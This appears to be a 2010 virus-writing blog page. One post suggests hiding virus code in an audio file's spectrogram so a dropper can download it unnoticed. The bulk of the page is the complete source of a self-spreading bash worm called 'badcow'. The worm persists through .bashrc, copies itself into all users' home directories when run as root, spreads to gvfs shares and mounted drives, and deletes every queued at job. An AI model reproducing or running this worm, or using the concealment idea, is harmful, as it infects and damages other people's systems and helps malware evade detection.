I have just discovered a nice tool called arss that allows you to play with spectrogram of sound signals.
It would be very cool to use this for vx stuff.
You could for example hide the virus code in the spectrum of an audio file so the virus can be stored in an http server and then downloaded (and extracted) using a dropper to the host system …
There is no suspect traffic in this way
Archive for January, 2010
Hide virus in sounds …
Sunday, January 3rd, 2010Bash scripting 2
Friday, January 1st, 2010I have improved a bit the bash worm, now it uses gvfs features too.
#!/bin/bash
# the badcow by WarGame
if [ ! -f "$HOME/.badcow.sh" ];
then
echo $HOME/.badcow.sh >> $HOME/.bashrc
fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&1
chmod +x $HOME/.badcow.sh > /dev/null 2>&1
if [ "$(id -u)" = "0" ];
then
for dr_home in `ls /home`
do
if [ -d "/home/$dr_home" ];
then
if [ ! -f "/home/$dr_home/.badcow.sh" ];
then
echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc
fi
cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&1
chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&1
chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&1
fi
done
exit 0
fi
if [ -d "$HOME/.gvfs" ]; # try to spread using the gnome virtual filesystem
then
for vfs in `ls $HOME/.gvfs`
do
if [ -d "$HOME/.gvfs/$vfs" ];
then
cp $HOME/.badcow.sh $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1
chmod +x $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1
fi
done
fi
for job in $(atq | awk '{print $1}' )
do
atrm $job > /dev/null 2>&1
done
at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&1
for dr in $(mount | awk '{print $3}' ) # try to copy itself in mounted drives
do
if [ -d "$dr" ];
then
cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&1
chmod +x $dr/badcow.sh > /dev/null 2>&1
fi
done